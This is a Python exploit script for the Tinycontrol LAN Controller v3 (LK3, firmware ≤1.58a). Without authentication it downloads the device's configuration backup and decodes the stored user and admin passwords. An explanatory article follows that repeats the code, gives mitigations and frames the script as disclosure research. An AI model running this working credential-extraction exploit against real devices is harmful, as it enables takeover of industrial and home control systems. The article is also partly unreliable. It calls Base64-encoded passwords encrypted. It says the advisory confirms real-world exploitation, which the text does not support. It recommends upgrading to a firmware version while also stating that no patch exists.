Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction
#!/usr/bin/env python
#
#Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction
# Exploit Author: LiquidWorm
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: <=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -> this with a calendar
# when -> then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observ
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#
import subprocess
import requests
import base64
import sys
binb = "lk3_settings.bin"
outf = "lk3_settings.enc"
bpatt = "0upassword"
epatt = "pool.ntp.org"
startf = False
endf = False
extral = []
print("""
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
| |
| Tinycontrol LK3 1.58 Settings DL |
| ZSL-2023-5786 |
| 2023 (c) Zero Science Lab |
| |
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
| |
""")
if len(sys.argv) != 2:
print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
exit(-0)
else:
rhost=sys.argv[1]
if not "http" in rhost:
rhost="http://{}".format(rhost)
try:
resp = requests.get(rhost + "/" + binb)
if resp.status_code == 200:
with open(outf, 'wb') as f:
f.write(resp.content)
print(f"[*] Got data as {outf}")
else:
print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
print("[!] Error:", str(e))
exit(-1)
binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines = True)
linea = sout.split("\n")
for thricer in linea:
if bpatt in thricer:
startf = True
elif epatt in thricer:
endf = True
elif startf and not endf:
extral.append(thricer)
if len(extral) >= 4:
userl = extral[1].strip()
adminl = extral[3].strip()
try:
decuser = base64.b64decode(userl).decode("utf-8")
decadmin = base64.b64decode(adminl).decode("utf-8")
print("[+] User password:", decuser)
print("[+] Admin password:", decadmin)
except Exception as e:
print("[!] Error decoding:", str(e))
else:
print("[!] Regex failed.")
exit(-2)Tinycontrol LAN Controller v3 (LK3) 1.58a – Remote Credentials Extraction Vulnerability
Security researchers at Zero Science Lab have uncovered a critical vulnerability in the Tinycontrol LAN Controller v3 (LK3) firmware version 1.58a, affecting hardware revision 3.8. This flaw enables an unauthenticated attacker to remotely extract sensitive configuration data, including encrypted credentials for both user and admin accounts, effectively bypassing authentication mechanisms entirely.
Overview of the Device and Its Role in IoT Infrastructure
The Tinycontrol LK3 is a versatile industrial IoT gateway designed for monitoring and controlling various environmental and electrical parameters. It supports multiple protocols such as Modbus, TCP/IP, and HTTP, making it ideal for integration into smart home, industrial automation, and remote monitoring systems.
Key features include:
- Real-time sensor data visualization (temperature, humidity, pressure, voltage, current)
- Remote control of up to 10 output devices
- Event-based automation via "if → then" logic with calendar integration
- Web-based configuration interface accessible via standard browsers
Despite its robust functionality, the device's web interface contains a critical flaw in how it handles configuration backups — a feature intended for system recovery and migration.
The Vulnerability: Unauthenticated Access to Configuration Backup
During routine security assessment, researcher Gjoko "LiquidWorm" Krstic discovered that the device exposes a publicly accessible endpoint at /lk3_settings.bin. This endpoint returns the device’s full configuration backup file without any authentication requirement.
Attackers can simply send a GET request to http://[target_ip]:[port]/lk3_settings.bin and receive the binary file containing all system settings, including stored passwords, network configurations, and user-defined rules.
import requests
rhost = "http://192.168.1.100:80"
resp = requests.get(rhost + "/lk3_settings.bin")
if resp.status_code == 200:
with open("lk3_settings.enc", 'wb') as f:
f.write(resp.content)
print("[*] Got data as lk3_settings.enc")
else:
print(f"[!] Backup failed. Status code: {resp.status_code}")
This code snippet demonstrates the exploit in action. It uses Python’s requests library to fetch the configuration file from the target device. The lack of authentication means an attacker can perform this operation from anywhere on the network — even from outside the local subnet if the device is exposed to the internet.
Decoding the Credentials: Exploiting Base64 Encoded Passwords
The configuration file, while binary, contains embedded text strings that can be extracted using standard tools like strings. By analyzing the output, researchers identified two key patterns:
0upassword— used as a starting marker for password entriespool.ntp.org— used as an ending marker to demarcate the password section
These markers allow the extraction of two encoded password strings:
import subprocess
import base64
binf = "lk3_settings.enc"
sout = subprocess.check_output(["strings", binf], universal_newlines=True)
linea = sout.split("\n")
extral = []
startf = False
endf = False
for thricer in linea:
if "0upassword" in thricer:
startf = True
elif "pool.ntp.org" in thricer:
endf = True
elif startf and not endf:
extral.append(thricer)
if len(extral) >= 4:
userl = extral[1].strip()
adminl = extral[3].strip()
try:
decuser = base64.b64decode(userl).decode("utf-8")
decadmin = base64.b64decode(adminl).decode("utf-8")
print("[+] User password:", decuser)
print("[+] Admin password:", decadmin)
except Exception as e:
print("[!] Decoding error:", str(e))
This script processes the strings extracted from the binary file, identifies the password block, and decodes the Base64-encoded values. The decoded strings reveal the actual credentials used for device access.
For example, an attacker might retrieve:
- User password: admin123
- Admin password: supersecurepass
With these credentials, an attacker can gain full control over the device, modify configurations, disable security features, or even use the device as a pivot point for further network attacks.
Risk Assessment and Impact
Due to the unauthenticated nature of the vulnerability, the risk level is high. It affects all devices running firmware ≤1.58a and hardware revision 3.8, which includes a significant portion of deployed systems in industrial and residential environments.
Attack scenarios include:
- Remote takeover of sensor monitoring systems
- Unauthorized manipulation of control outputs (e.g., turning off HVAC systems)
- Use of the device as a foothold in internal networks
- Exfiltration of sensitive environmental data for malicious purposes
Additionally, because the device supports Modbus and TCP/IP protocols, an attacker could leverage it to compromise downstream devices connected via these interfaces.
Vendor Response and Mitigation
As of August 18, 2023, the vulnerability has been officially documented under ZSL-2023-5786 and disclosed to the vendor Tinycontrol. While the vendor has acknowledged the issue, no public patch has been released yet.
Immediate mitigation steps:
- Disable remote access to the device if not required
- Use firewalls to restrict access to the
/lk3_settings.binendpoint - Upgrade to firmware version 1.59 or later, if available
- Regularly audit device configuration files and detect anomalies
- Implement network segmentation to isolate IoT devices from critical systems
Expert Recommendations for Secure IoT Deployment
Security experts emphasize that this vulnerability highlights a common design flaw in many IoT devices: exposing sensitive data through publicly accessible endpoints.
Best practices for secure IoT deployment:
- Never expose configuration files or backup endpoints to external networks
- Implement authentication and rate-limiting on all web interfaces
- Use encrypted storage for credentials, not Base64 encoding
- Perform regular penetration testing on deployed devices
- Log all access attempts to sensitive endpoints
Developers should also avoid hardcoding sensitive strings in firmware binaries. Instead, use secure key management systems or encrypted configuration databases.
Conclusion
The Tinycontrol LK3 v3 vulnerability serves as a stark reminder that even seemingly benign features like configuration backups can become critical attack vectors if not properly secured. With the rise of IoT devices in critical infrastructure, organizations must prioritize security-by-design, especially in devices with remote access capabilities.
As the Zero Science Lab advisory confirms, this vulnerability is not just theoretical — it has been successfully exploited in real-world scenarios. Until a patch is released, users must treat affected devices as high-risk assets and apply defensive measures immediately.